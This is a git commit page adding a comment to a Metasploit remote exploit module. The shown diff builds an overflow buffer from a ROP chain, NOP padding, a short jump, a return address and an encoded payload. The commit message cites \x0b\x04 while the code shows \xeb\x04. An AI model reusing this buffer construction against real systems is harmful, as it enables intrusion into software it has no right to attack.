Comment what \x0b\x04 is for
This commit is contained in:
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
pay = rop_chain
|
||||
pay << make_nops(374 - rop_chain.length)
|
||||
pay << "\xeb\x04"
|
||||
pay << "\xeb\x04" #Short jmp 0x04
|
||||
pay << [target.ret].pack('V')
|
||||
pay << payload.encoded
|
||||
|
||||
|
||||
Reference in New Issue
Block a user